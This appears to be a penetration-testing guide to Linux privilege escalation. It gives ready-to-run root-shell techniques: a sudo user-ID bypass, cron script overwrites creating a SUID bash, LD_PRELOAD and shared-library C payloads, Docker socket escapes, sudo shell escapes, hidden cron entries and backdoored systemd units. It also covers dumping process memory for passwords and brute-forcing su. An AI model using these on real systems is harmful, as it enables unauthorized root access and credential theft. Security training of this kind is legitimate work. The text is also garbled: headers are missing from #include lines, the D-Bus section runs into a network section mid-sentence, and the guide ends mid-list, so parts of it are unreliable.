# Linux Privilege Escalation
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## System Information ### OS info Let's start gaining some knowledge of the OS running ```bash (cat /proc/version || uname -a ) 2>/dev/null lsb_release -a 2>/dev/null # old, not by default on many systems cat /etc/os-release 2>/dev/null # universal on modern systems ``` ### Path If you **have write permissions on any folder inside the `PATH`** variable you may be able to hijack some libraries or binaries: ```bash echo $PATH ``` ### Env info Interesting information, passwords or API keys in the environment variables? ```bash (env || set) 2>/dev/null ``` ### Kernel exploits Check the kernel version and if there is some exploit that can be used to escalate privileges ```bash cat /proc/version uname -a searchsploit "Linux Kernel" ``` You can find a good vulnerable kernel list and some already **compiled exploits** here: [https://github.com/lucyoa/kernel-exploits](https://github.com/lucyoa/kernel-exploits) and [exploitdb sploits](https://github.com/offensive-security/exploitdb-bin-sploits/tree/master/bin-sploits).\ Other sites where you can find some **compiled exploits**: [https://github.com/bwbwbwbw/linux-exploit-binaries](https://github.com/bwbwbwbw/linux-exploit-binaries), [https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack](https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack) To extract all the vulnerable kernel versions from that web you can do: ```bash curl https://raw.githubusercontent.com/lucyoa/kernel-exploits/master/README.md 2>/dev/null | grep "Kernels: " | cut -d ":" -f 2 | cut -d "<" -f 1 | tr -d "," | tr ' ' '\n' | grep -v "^\d\.\d$" | sort -u -r | tr '\n' ' ' ``` Tools that could help to search for kernel exploits are: [linux-exploit-suggester.sh](https://github.com/mzet-/linux-exploit-suggester)\ [linux-exploit-suggester2.pl](https://github.com/jondonas/linux-exploit-suggester-2)\ [linuxprivchecker.py](http://www.securitysift.com/download/linuxprivchecker.py) (execute IN victim,only checks exploits for kernel 2.x) Always **search the kernel version in Google**, maybe your kernel version is written in some kernel exploit and then you will be sure that this exploit is valid. ### CVE-2016-5195 (DirtyCow) Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8 ```bash # make dirtycow stable echo 0 > /proc/sys/vm/dirty_writeback_centisecs g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs https://github.com/evait-security/ClickNRoot/blob/master/1/exploit.c ``` ### Sudo version Based on the vulnerable sudo versions that appear in: ```bash searchsploit sudo ``` You can check if the sudo version is vulnerable using this grep. ```bash sudo -V | grep "Sudo ver" | grep "1\.[01234567]\.[0-9]\+\|1\.8\.1[0-9]\*\|1\.8\.2[01234567]" ``` ### sudo < v1.28 From @sickrov ``` sudo -u#-1 /bin/bash ``` ### Dmesg signature verification failed Check **smasher2 box of HTB** for an **example** of how this vuln could be exploited ```bash dmesg 2>/dev/null | grep "signature" ``` ### More system enumeration ```bash date 2>/dev/null #Date (df -h || lsblk) #System stats lscpu #CPU info lpstat -a 2>/dev/null #Printers info ``` ## Enumerate possible defenses ### AppArmor ```bash if [ `which aa-status 2>/dev/null` ]; then aa-status elif [ `which apparmor_status 2>/dev/null` ]; then apparmor_status elif [ `ls -d /etc/apparmor* 2>/dev/null` ]; then ls -d /etc/apparmor* else echo "Not found AppArmor" fi ``` ### Grsecurity ```bash ((uname -r | grep "\-grsec" >/dev/null 2>&1 || grep "grsecurity" /etc/sysctl.conf >/dev/null 2>&1) && echo "Yes" || echo "Not found grsecurity") ``` ### PaX ```bash (which paxctl-ng paxctl >/dev/null 2>&1 && echo "Yes" || echo "Not found PaX") ``` ### Execshield ```bash (grep "exec-shield" /etc/sysctl.conf || echo "Not found Execshield") ``` ### SElinux ```bash (sestatus 2>/dev/null || echo "Not found sestatus") ``` ### ASLR ```bash cat /proc/sys/kernel/randomize_va_space 2>/dev/null #If 0, not enabled ``` ## Docker Breakout If you are inside a docker container you can try to escape from it: {% content-ref url="docker-security/" %} [docker-security](docker-security/) {% endcontent-ref %} ## Drives Check **what is mounted and unmounted**, where and why. If anything is unmounted you could try to mount it and check for private info ```bash ls /dev 2>/dev/null | grep -i "sd" cat /etc/fstab 2>/dev/null | grep -v "^#" | grep -Pv "\W*\#" 2>/dev/null #Check if credentials in fstab grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null ``` ## Useful software Enumerate useful binaries ```bash which nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch docker lxc ctr runc rkt kubectl 2>/dev/null ``` Also, check if **any compiler is installed**. This is useful if you need to use some kernel exploit as it's recommended to compile it in the machine where you are going to use it (or in one similar) ```bash (dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; which gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/") ``` ### Vulnerable Software Installed Check for the **version of the installed packages and services**. Maybe there is some old Nagios version (for example) that could be exploited for escalating privileges…\ It is recommended to check manually the version of the more suspicious installed software. ```bash dpkg -l #Debian rpm -qa #Centos ``` If you have SSH access to the machine you could also use **openVAS** to check for outdated and vulnerable software installed inside the machine. {% hint style="info" %} _Note that these commands will show a lot of information that will mostly be useless, therefore it's recommended some applications like OpenVAS or similar that will check if any installed software version is vulnerable to known exploits_ {% endhint %} ## Processes Take a look at **what processes** are being executed and check if any process has **more privileges than it should** (maybe a tomcat being executed by root?) ```bash ps aux ps -ef top -n 1 ``` Always check for possible [**electron/cef/chromium debuggers** running, you could abuse it to escalate privileges](electron-cef-chromium-debugger-abuse.md). **Linpeas** detect those by checking the `--inspect` parameter inside the command line of the process.\ Also **check your privileges over the processes binaries**, maybe you can overwrite someone. ### Process monitoring You can use tools like [**pspy**](https://github.com/DominicBreuker/pspy) to monitor processes. This can be very useful to identify vulnerable processes being executed frequently or when a set of requirements are met. ### Process memory Some services of a server save **credentials in clear text inside the memory**.\ Normally you will need **root privileges** to read the memory of processes that belong to other users, therefore this is usually more useful when you are already root and want to discover more credentials.\ However, remember that **as a regular user you can read the memory of the processes you own**. {% hint style="warning" %} Note that nowadays most machines **don't allow ptrace by default** which means that you cannot dump other processes that belong to your unprivileged user. The file _**/proc/sys/kernel/yama/ptrace\_scope**_ controls the accessibility of ptrace: * **kernel.yama.ptrace\_scope = 0**: all processes can be debugged, as long as they have the same uid. This is the classical way of how ptracing worked. * **kernel.yama.ptrace\_scope = 1**: only a parent process can be debugged. * **kernel.yama.ptrace\_scope = 2**: Only admin can use ptrace, as it required CAP\_SYS\_PTRACE capability. * **kernel.yama.ptrace\_scope = 3**: No processes may be traced with ptrace. Once set, a reboot is needed to enable ptracing again. {% endhint %} #### GDB If you have access to the memory of an FTP service (for example) you could get the Heap and search inside of its credentials. ```bash gdb -p (gdb) info proc mappings (gdb) q (gdb) dump memory /tmp/mem_ftp (gdb) q strings /tmp/mem_ftp #User and password ``` #### GDB Script {% code title="dump-memory.sh" %} ```bash #!/bin/bash #./dump-memory.sh grep rw-p /proc/$1/maps \ | sed -n 's/^\([0-9a-f]*\)-\([0-9a-f]*\) .*$/\1 \2/p' \ | while read start stop; do \ gdb --batch --pid $1 -ex \ "dump memory $1-$start-$stop.dump 0x$start 0x$stop"; \ done ``` {% endcode %} #### /proc/$pid/maps & /proc/$pid/mem For a given process ID, **maps show how memory is mapped within that process's** virtual address space; it also shows the **permissions of each mapped region**. The **mem** pseudo file **exposes the processes memory itself**. From the **maps** file we know which **memory regions are readable** and their offsets. We use this information to **seek into the mem file and dump all readable regions** to a file. ```bash procdump() ( cat /proc/$1/maps | grep -Fv ".so" | grep " 0 " | awk '{print $1}' | ( IFS="-" while read a b; do dd if=/proc/$1/mem bs=$( getconf PAGESIZE ) iflag=skip_bytes,count_bytes \ skip=$(( 0x$a )) count=$(( 0x$b - 0x$a )) of="$1_mem_$a.bin" done ) cat $1*.bin > $1.dump rm $1*.bin ) ``` #### /dev/mem `/dev/mem` provides access to the system's **physical** memory, not the virtual memory. The kernel's virtual address space can be accessed using /dev/kmem.\ Typically, `/dev/mem` is only readable by **root** and **kmem** group. ``` strings /dev/mem -n10 | grep -i PASS ``` ### ProcDump for linux ProcDump is a Linux reimagining of the classic ProcDump tool from the Sysinternals suite of tools for Windows. Get it in [https://github.com/Sysinternals/ProcDump-for-Linux](https://github.com/Sysinternals/ProcDump-for-Linux) ``` procdump -p 1714 ProcDump v1.2 - Sysinternals process dump utility Copyright (C) 2020 Microsoft Corporation. All rights reserved. Licensed under the MIT license. Mark Russinovich, Mario Hewardt, John Salem, Javid Habibi Monitors a process and writes a dump file when the process meets the specified criteria. Process: sleep (1714) CPU Threshold: n/a Commit Threshold: n/a Thread Threshold: n/a File descriptor Threshold: n/a Signal: n/a Polling interval (ms): 1000 Threshold (s): 10 Number of Dumps: 1 Output directory for core dumps: . Press Ctrl-C to end monitoring without terminating the process. [20:20:58 - WARN]: Procdump not running with elevated credentials. If your uid does not match the uid of the target process procdump will not be able to capture memory dumps [20:20:58 - INFO]: Timed: [20:21:00 - INFO]: Core dump 0 generated: ./sleep_time_2021-11-03_20:20:58.1714 ``` ### Tools To dump a process memory you could use: * [**https://github.com/Sysinternals/ProcDump-for-Linux**](https://github.com/Sysinternals/ProcDump-for-Linux) * [**https://github.com/hajzer/bash-memory-dump**](https://github.com/hajzer/bash-memory-dump) (root) - \_You can manually remove root requirements and dump the process owned by you * Script A.5 from [**https://www.delaat.net/rp/2016-2017/p97/report.pdf**](https://www.delaat.net/rp/2016-2017/p97/report.pdf) (root is required) ### Credentials from Process Memory #### Manual example If you find that the authenticator process is running: ```bash ps -ef | grep "authenticator" root 2027 2025 0 11:46 ? 00:00:00 authenticator ``` You can dump the process (see before sections to find different ways to dump the memory of a process) and search for credentials inside the memory: ```bash ./dump-memory.sh 2027 strings *.dump | grep -i password ``` #### mimipenguin The tool [**https://github.com/huntergregal/mimipenguin**](https://github.com/huntergregal/mimipenguin) will **steal clear text credentials from memory** and from some **well known files**. It requires root privileges to work properly. | Feature | Process Name | | ------------------------------------------------- | -------------------- | | GDM password (Kali Desktop, Debian Desktop) | gdm-password | | Gnome Keyring (Ubuntu Desktop, ArchLinux Desktop) | gnome-keyring-daemon | | LightDM (Ubuntu Desktop) | lightdm | | VSFTPd (Active FTP Connections) | vsftpd | | Apache2 (Active HTTP Basic Auth Sessions) | apache2 | | OpenSSH (Active SSH Sessions - Sudo Usage) | sshd: | #### Search Regexes/[truffleproc](https://github.com/controlplaneio/truffleproc) ```bash # un truffleproc.sh against your current Bash shell (e.g. $$) ./truffleproc.sh $$ # coredumping pid 6174 Reading symbols from od... Reading symbols from /usr/lib/systemd/systemd... Reading symbols from /lib/systemd/libsystemd-shared-247.so... Reading symbols from /lib/x86_64-linux-gnu/librt.so.1... [...] # extracting strings to /tmp/tmp.o6HV0Pl3fe # finding secrets # results in /tmp/tmp.o6HV0Pl3fe/results.txt ``` ## Scheduled/Cron jobs Check if any scheduled job is vulnerable. Maybe you can take advantage of a script being executed by root (wildcard vuln? can modify files that root uses? use symlinks? create specific files in the directory that root uses?). ```bash crontab -l ls -al /etc/cron* /etc/at* cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/root 2>/dev/null | grep -v "^#" ``` ### Cron path For example, inside _/etc/crontab_ you can find the PATH: _PATH=**/home/user**:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin_ (_Note how the user "user" has writing privileges over /home/user_) If inside this crontab the root user tries to execute some command or script without setting the path. For example: _\* \* \* \* root overwrite.sh_\ Then, you can get a root shell by using: ```bash echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh #Wait cron job to be executed /tmp/bash -p #The effective uid and gid to be set to the real uid and gid ``` ### Cron using a script with a wildcard (Wildcard Injection) If a script is executed by root has a “**\***” inside a command, you could exploit this to make unexpected things (like privesc). Example: ```bash rsync -a *.sh rsync://host.back/src/rbd #You can create a file called "-e sh myscript.sh" so the script will execute our script ``` **If the wildcard is preceded of a path like** _**/some/path/\***_ **, it's not vulnerable (even** _**./\***_ **is not).** Read the following page for more wildcard exploitation tricks: {% content-ref url="wildcards-spare-tricks.md" %} [wildcards-spare-tricks.md](wildcards-spare-tricks.md) {% endcontent-ref %} ### Cron script overwriting and symlink If you **can modify a cron script** executed by root, you can get a shell very easily: ```bash echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > #Wait until it is executed /tmp/bash -p ``` If the script executed by root uses a **directory where you have full access**, maybe it could be useful to delete that folder and **create a symlink folder to another one** serving a script controlled by you ```bash ln -d -s ``` ### Frequent cron jobs You can monitor the processes to search for processes that are being executed every 1, 2 or 5 minutes. Maybe you can take advantage of it and escalate privileges. For example, to **monitor every 0.1s during 1 minute**, **sort by less executed commands** and delete the commands that have been executed the most, you can do: ```bash for i in $(seq 1 610); do ps -e --format cmd >> /tmp/monprocs.tmp; sleep 0.1; done; sort /tmp/monprocs.tmp | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort | grep -E -v "\s*[6-9][0-9][0-9]|\s*[0-9][0-9][0-9][0-9]"; rm /tmp/monprocs.tmp; ``` **You can also use** [**pspy**](https://github.com/DominicBreuker/pspy/releases) (this will monitor and list every process that starts). ### Invisible cron jobs It's possible to create a cronjob **putting a carriage return after a comment** (without newline character), and the cron job will work. Example (note the carriage return char): ```bash #This is a comment inside a cron config file\r* * * * * echo "Surprise!" ``` ## Services ### Writable _.service_ files Check if you can write any `.service` file, if you can, you **could modify it** so it **executes** your **backdoor when** the service is **started**, **restarted** or **stopped** (maybe you will need to wait until the machine is rebooted).\ For example create your backdoor inside the .service file with **`ExecStart=/tmp/script.sh`** ### Writable service binaries Keep in mind that if you have **write permissions over binaries being executed by services**, you can change them for backdoors so when the services get re-executed the backdoors will be executed. ### systemd PATH - Relative Paths You can see the PATH used by **systemd** with: ```bash systemctl show-environment ``` If you find that you can **write** in any of the folders of the path you may be able to **escalate privileges**. You need to search for **relative paths being used on service configurations** files like: ```bash ExecStart=faraday-server ExecStart=/bin/sh -ec 'ifup --allow=hotplug %I; ifquery --state %I' ExecStop=/bin/sh "uptux-vuln-bin3 -stuff -hello" ``` Then, create an **executable** with the **same name as the relative path binary** inside the systemd PATH folder you can write, and when the service is asked to execute the vulnerable action (**Start**, **Stop**, **Reload**), your **backdoor will be executed** (unprivileged users usually cannot start/stop services but check if you can use `sudo -l`). **Learn more about services with `man systemd.service`.** ## **Timers** **Timers** are systemd unit files whose name ends in `**.timer**` that control `**.service**` files or events. **Timers** can be used as an alternative to cron as they have built-in support for calendar time events and monotonic time events and can be run asynchronously. You can enumerate all the timers with: ```bash systemctl list-timers --all ``` ### Writable timers If you can modify a timer you can make it execute some existents of systemd.unit (like a `.service` or a `.target`) ```bash Unit=backdoor.service ``` In the documentation you can read what the Unit is: > The unit to activate when this timer elapses. The argument is a unit name, whose suffix is not ".timer". If not specified, this value defaults to a service that has the same name as the timer unit, except for the suffix. (See above.) It is recommended that the unit name that is activated and the unit name of the timer unit are named identically, except for the suffix. Therefore, to abuse this permission you would need to: * Find some systemd unit (like a `.service`) that is **executing a writable binary** * Find some systemd unit that is **executing a relative path** and you have **writable privileges** over the **systemd PATH** (to impersonate that executable) **Learn more about timers with `man systemd.timer`.** ### **Enabling Timer** To enable a timer you need root privileges and to execute: ```bash sudo systemctl enable backu2.timer Created symlink /etc/systemd/system/multi-user.target.wants/backu2.timer → /lib/systemd/system/backu2.timer. ``` Note the **timer** is **activated** by creating a symlink to it on `/etc/systemd/system/.wants/.timer` ## Sockets In brief, a Unix Socket (technically, the correct name is Unix Domain Socket, **UDS**) allows **communication between two different processes** on either the same machine or different machines in client-server application frameworks. To be more precise, it’s a way of communicating among computers using a standard Unix descriptors file. (From [here](https://www.linux.com/news/what-socket/)). Sockets can be configured using `.socket` files. **Learn more about sockets with `man systemd.socket`.** Inside this file, several interesting parameters can be configured: * `ListenStream`, `ListenDatagram`, `ListenSequentialPacket`, `ListenFIFO`, `ListenSpecial`, `ListenNetlink`, `ListenMessageQueue`, `ListenUSBFunction`: These options are different but a summary is used to **indicate where it is going to listen** to the socket (the path of the AF\_UNIX socket file, the IPv4/6 and/or port number to listen, etc.) * `Accept`: Takes a boolean argument. If **true**, a **service instance is spawned for each incoming connection** and only the connection socket is passed to it. If **false**, all listening sockets themselves are **passed to the started service unit**, and only one service unit is spawned for all connections. This value is ignored for datagram sockets and FIFOs where a single service unit unconditionally handles all incoming traffic. **Defaults to false**. For performance reasons, it is recommended to write new daemons only in a way that is suitable for `Accept=no`. * `ExecStartPre`, `ExecStartPost`: Takes one or more command lines, which are **executed before** or **after** the listening **sockets**/FIFOs are **created** and bound, respectively. The first token of the command line must be an absolute filename, then followed by arguments for the process. * `ExecStopPre`, `ExecStopPost`: Additional **commands** that are **executed before** or **after** the listening **sockets**/FIFOs are **closed** and removed, respectively. * `Service`: Specifies the **service** unit name **to activate** on **incoming traffic**. This setting is only allowed for sockets with Accept=no. It defaults to the service that bears the same name as the socket (with the suffix replaced). In most cases, it should not be necessary to use this option. ### Writable .socket files If you find a **writable** `.socket` file you can **add** at the beginning of the `[Socket]` section something like: `ExecStartPre=/home/kali/sys/backdoor` and the backdoor will be executed before the socket is created. Therefore, you will **probably need to wait until the machine is rebooted.**\ _Note that the system must be using that socket file configuration or the backdoor won't be executed_ ### Writable sockets If you **identify any writable socket** (_now we are talking about Unix Sockets and not about the config `.socket` files_), then **you can communicate** with that socket and maybe exploit a vulnerability. ### Enumerate Unix Sockets ```bash netstat -a -p --unix ``` ### Raw connection ```bash #apt-get install netcat-openbsd nc -U /tmp/socket #Connect to UNIX-domain stream socket nc -uU /tmp/socket #Connect to UNIX-domain datagram socket #apt-get install socat socat - UNIX-CLIENT:/dev/socket #connect to UNIX-domain socket, irrespective of its type ``` **Exploitation example:** {% content-ref url="socket-command-injection.md" %} [socket-command-injection.md](socket-command-injection.md) {% endcontent-ref %} ### HTTP sockets Note that there may be some **sockets listening for HTTP** requests (_I'm not talking about .socket files but the files acting as unix sockets_). You can check this with: ```bash curl --max-time 2 --unix-socket /pat/to/socket/files http:/index ``` If the socket **responds with an HTTP** request, then you can **communicate** with it and maybe **exploit some vulnerability**. ### Writable Docker Socket The **docker socke**t is typically located at `/var/run/docker.sock` and is only writable by the `root` user and `docker` group.\ If for some reason **you have write permissions** over that socket you can escalate privileges.\ The following commands can be used to escalate privileges: ```bash docker -H unix:///var/run/docker.sock run -v /:/host -it ubuntu chroot /host /bin/bash docker -H unix:///var/run/docker.sock run -it --privileged --pid=host debian nsenter -t 1 -m -u -n -i sh ``` #### Use docker web API from socket without docker package If you have access to **docker socket** but you can't use the docker binary (maybe it isn't even installed), you can use the web API directly with `curl`. The following commands are an example of how to **create a docker container that mounts the root** of the host system and use `socat` to execute commands into the new docker. ```bash # List docker images curl -XGET --unix-socket /var/run/docker.sock http://localhost/images/json #[{"Containers":-1,"Created":1588544489,"Id":"sha256:",...}] # Send JSON to docker API to create the container curl -XPOST -H "Content-Type: application/json" --unix-socket /var/run/docker.sock -d '{"Image":"","Cmd":["/bin/sh"],"DetachKeys":"Ctrl-p,Ctrl-q","OpenStdin":true,"Mounts":[{"Type":"bind","Source":"/","Target":"/host_root"}]}' http://localhost/containers/create #{"Id":"","Warnings":[]} curl -XPOST --unix-socket /var/run/docker.sock http://localhost/containers//start ``` The last step is to use `socat` to initiate a connection to the container, sending an "attach" request ```bash socat - UNIX-CONNECT:/var/run/docker.sock POST /containers//attach?stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1 Host: Connection: Upgrade Upgrade: tcp #HTTP/1.1 101 UPGRADED #Content-Type: application/vnd.docker.raw-stream #Connection: Upgrade #Upgrade: tcp ``` Now, you can execute commands on the container from this `socat` connection. ### Others Note that if you have write permissions over the docker socket because you are **inside the group `docker`** you have [**more ways to escalate privileges**](interesting-groups-linux-pe/#docker-group). If the [**docker API is listening in a port** you can also be able to compromise it](../../network-services-pentesting/2375-pentesting-docker.md#compromising). Check **more ways to break out from docker or abuse it to escalate privileges** in: {% content-ref url="docker-security/" %} [docker-security](docker-security/) {% endcontent-ref %} ## Containerd (ctr) privilege escalation If you find that you can use the **`ctr`** command read the following page as **you may be able to abuse it to escalate privileges**: {% content-ref url="containerd-ctr-privilege-escalation.md" %} [containerd-ctr-privilege-escalation.md](containerd-ctr-privilege-escalation.md) {% endcontent-ref %} ## **RunC** privilege escalation If you find that you can use the **`runc`** command read the following page as **you may be able to abuse it to escalate privileges**: {% content-ref url="runc-privilege-escalation.md" %} [runc-privilege-escalation.md](runc-privilege-escalation.md) {% endcontent-ref %} ## **D-Bus** D-BUS is an **inter-Process Communication (IPC) system**, providing a simple yet powerful mechanism **allowing applications to talk to one another**, communicate information and request services. D-BUS was designed from scratch to fulfil the needs of a modern Linux system. As a full-featured IPC and object system, D-BUS has several intended uses. First, D-BUS can perform basic application IPC, allowing one process to shuttle data to another—think **UNIX domain sockets on steroids**. Second, D-BUS can facilitate sending events, or signals, through the system, allowing different components in the system to communicate and ultimately integrate better. For example, a Bluetooth daemon can send an incoming call signal that your music player can intercept, muting the volume until the call ends. Finally, D-BUS implements a remote object system, letting one application request services and invoke methods from a different object—think CORBA without the complications. (From [here](https://www.linuxjournal.com/article/7744)). D-Bus uses an **allow/deny model**, where each message (method call, signal emission, etc.) can be **allowed or denied** according to the sum of all policy rules which match it. Each rule in the policy should have the `own`, `send_destination` or `receive_sender` attribute set. Part of the policy of `/etc/dbus-1/system.d/wpa_supplicant.conf`: ```markup ``` Therefore, if a policy is allowing your user in any way to **interact with the bus**, you could be able to exploit it to escalate privileges (maybe just listing for some passwords?). Note that a **policy** that **doesn't specify** any user or group affects everyone (``).\ Policies to the context "default" affects everyone not affected by other policies (`/dev/null; cat /etc/iptables/* | grep -v "^#" | grep -Pv "\W*\#" 2>/dev/null) #Files used by network services lsof -i ``` ### Open ports Always check network services running on the machine that you weren't able to interact with before accessing it: ```bash (netstat -punta || ss --ntpu) (netstat -punta || ss --ntpu) | grep "127.0" ``` ### Sniffing Check if you can sniff traffic. If you can, you could be able to grab some credentials. ``` timeout 1 tcpdump ``` ## Users ### Generic Enumeration Check **who** you are, which **privileges** do you have, which **users** are in the systems, which ones can **login** and which ones have **root privileges:** ```bash #Info about me id || (whoami && groups) 2>/dev/null #List all users cat /etc/passwd | cut -d: -f1 #List users with console cat /etc/passwd | grep "sh$" #List superusers awk -F: '($3 == "0") {print}' /etc/passwd #Currently logged users w #Login history last | tail #Last log of each user lastlog #List all users and their groups for i in $(cut -d":" -f1 /etc/passwd 2>/dev/null);do id $i;done 2>/dev/null | sort #Current user PGP keys gpg --list-keys 2>/dev/null ``` ### Big UID Some Linux versions were affected by a bug that allows users with **UID > INT\_MAX** to escalate privileges. More info: [here](https://gitlab.freedesktop.org/polkit/polkit/issues/74), [here](https://github.com/mirchr/security-research/blob/master/vulnerabilities/CVE-2018-19788.sh) and [here](https://twitter.com/paragonsec/status/1071152249529884674).\ **Exploit it** using: **`systemd-run -t /bin/bash`** ### Groups Check if you are a **member of some group** that could grant you root privileges: {% content-ref url="interesting-groups-linux-pe/" %} [interesting-groups-linux-pe](interesting-groups-linux-pe/) {% endcontent-ref %} ### Clipboard Check if anything interesting is located inside the clipboard (if possible) ```bash if [ `which xclip 2>/dev/null` ]; then echo "Clipboard: "`xclip -o -selection clipboard 2>/dev/null` echo "Highlighted text: "`xclip -o 2>/dev/null` elif [ `which xsel 2>/dev/null` ]; then echo "Clipboard: "`xsel -ob 2>/dev/null` echo "Highlighted text: "`xsel -o 2>/dev/null` else echo "Not found xsel and xclip" fi ``` ### Password Policy ```bash grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs ``` ### Known passwords If you **know any password** of the environment **try to login as each user** using the password. ### Su Brute If don't mind about doing a lot of noise and `su` and `timeout` binaries are present on the computer, you can try to brute-force user using [su-bruteforce](https://github.com/carlospolop/su-bruteforce).\ [**Linpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) with `-a` parameter also try to brute-force users. ## Writable PATH abuses ### $PATH If you find that you can **write inside some folder of the $PATH** you may be able to escalate privileges by **creating a backdoor inside the writable folder** with the name of some command that is going to be executed by a different user (root ideally) and that is **not loaded from a folder that is located previous** to your writable folder in $PATH. ### SUDO and SUID You could be allowed to execute some command using sudo or they could have the suid bit. Check it using: ```bash sudo -l #Check commands you can execute with sudo find / -perm -4000 2>/dev/null #Find all SUID binaries ``` Some **unexpected commands allow you to read and/or write files or even execute a command.** For example: ```bash sudo awk 'BEGIN {system("/bin/sh")}' sudo find /etc -exec sh -i \; sudo tcpdump -n -i lo -G1 -w /dev/null -z ./runme.sh sudo tar c a.tar -I ./runme.sh a ftp>!/bin/sh less>! ``` ### NOPASSWD Sudo configuration might allow a user to execute some command with another user's privileges without knowing the password. ``` $ sudo -l User demo may run the following commands on crashlab: (root) NOPASSWD: /usr/bin/vim ``` In this example the user `demo` can run `vim` as `root`, it is now trivial to get a shell by adding an ssh key into the root directory or by calling `sh`. ``` sudo vim -c '!sh' ``` ### SETENV This directive allows the user to **set an environment variable** while executing something: ```bash $ sudo -l User waldo may run the following commands on admirer: (ALL) SETENV: /opt/scripts/admin_tasks.sh ``` This example, **based on HTB machine Admirer**, was **vulnerable** to **PYTHONPATH hijacking** to load an arbitrary python library while executing the script as root: ```bash sudo PYTHONPATH=/dev/shm/ /opt/scripts/admin_tasks.sh ``` ### Sudo execution bypassing paths **Jump** to read other files or use **symlinks**. For example in sudoers file: _hacker10 ALL= (root) /bin/less /var/log/\*_ ```bash sudo less /var/logs/anything less>:e /etc/shadow #Jump to read other files using privileged less ``` ```bash ln /etc/shadow /var/log/new sudo less /var/log/new #Use symlinks to read any file ``` If a **wildcard** is used (\*), it is even easier: ```bash sudo less /var/log/../../etc/shadow #Read shadow sudo less /var/log/something /etc/shadow #Red 2 files ``` **Countermeasures**: [https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-5-recapitulation/](https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-5-recapitulation/) ### Sudo command/SUID binary without command path If the **sudo permission** is given to a single command **without specifying the path**: _hacker10 ALL= (root) less_ you can exploit it by changing the PATH variable ```bash export PATH=/tmp:$PATH #Put your backdoor in /tmp and name it "less" sudo less ``` This technique can also be used if a **suid** binary **executes another command without specifying the path to it (always check with** _**strings**_ **the content of a weird SUID binary)**. [Payload examples to execute.](payloads-to-execute.md) ### SUID binary with command path If the **suid** binary **executes another command specifying the path**, then, you can try to **export a function** named as the command that the suid file is calling. For example, if a suid binary calls _**/usr/sbin/service apache2 start**_ you have to try to create the function and export it: ```bash function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; } export -f /usr/sbin/service ``` Then, when you call the suid binary, this function will be executed ### LD\_PRELOAD & **LD\_LIBRARY\_PATH** **LD\_PRELOAD** is an optional environmental variable containing one or more paths to shared libraries, or shared objects, that the loader will load before any other shared library including the C runtime library (libc.so) This is called preloading a library. To avoid this mechanism being used as an attack vector for _suid/sgid_ executable binaries, the loader ignores _LD\_PRELOAD_ if _ruid != euid_. For such binaries, only libraries in standard paths that are also _suid/sgid_ will be preloaded. If you find inside the output of **`sudo -l`** the sentence: _**env\_keep+=LD\_PRELOAD**_ and you can call some command with sudo, you can escalate privileges. ``` Defaults env_keep += LD_PRELOAD ``` Save as **/tmp/pe.c** ```c #include #include #include void _init() { unsetenv("LD_PRELOAD"); setgid(0); setuid(0); system("/bin/bash"); } ``` Then **compile it** using: ```bash cd /tmp gcc -fPIC -shared -o pe.so pe.c -nostartfiles ``` Finally, **escalate privileges** running ```bash sudo LD_PRELOAD=./pe.so #Use any command you can run with sudo ``` {% hint style="danger" %} A similar privesc can be abused if the attacker controls the **LD\_LIBRARY\_PATH** env variable because he controls the path where libraries are going to be searched. {% endhint %} ```c #include #include static void hijack() __attribute__((constructor)); void hijack() { unsetenv("LD_LIBRARY_PATH"); setresuid(0,0,0); system("/bin/bash -p"); } ``` ```bash # Compile & execute cd /tmp gcc -o /tmp/libcrypt.so.1 -shared -fPIC /home/user/tools/sudo/library_path.c sudo LD_LIBRARY_PATH=/tmp ``` ### SUID Binary – .so injection If you find some weird binary with **SUID** permissions, you could check if all the **.so** files are **loaded correctly**. To do so you can execute: ```bash strace 2>&1 | grep -i -E "open|access|no such file" ``` For example, if you find something like: _pen(“/home/user/.config/libcalc.so”, O\_RDONLY) = -1 ENOENT (No such file or directory)_ you can exploit it. Create the file _/home/user/.config/libcalc.c_ with the code: ```c #include #include static void inject() __attribute__((constructor)); void inject(){ system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p"); } ``` Compile it using: ```bash gcc -shared -o /home/user/.config/libcalc.so -fPIC /home/user/.config/libcalc.c ``` And execute the binary. ## Shared Object Hijacking ```bash # Lets find a SUID using a non-standard library ldd some_suid something.so => /lib/x86_64-linux-gnu/something.so # The SUID also loads libraries from a custom location where we can write readelf -d payroll | grep PATH 0x000000000000001d (RUNPATH) Library runpath: [/development] ``` Now that we have found a SUID binary loading a library from a folder where we can write, lets create the library in that folder with the necessary name: ```c //gcc src.c -fPIC -shared -o /development/libshared.so #include #include static void hijack() __attribute__((constructor)); void hijack() { setresuid(0,0,0); system("/bin/bash -p"); } ``` If you get an error such as ```shell-session ./suid_bin: symbol lookup error: ./suid_bin: undefined symbol: a_function_name ``` that means that the library you have generated need to have a function called `a_function_name`. ### GTFOBins [**GTFOBins**](https://gtfobins.github.io) is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions. [**GTFOArgs**](https://gtfoargs.github.io/) 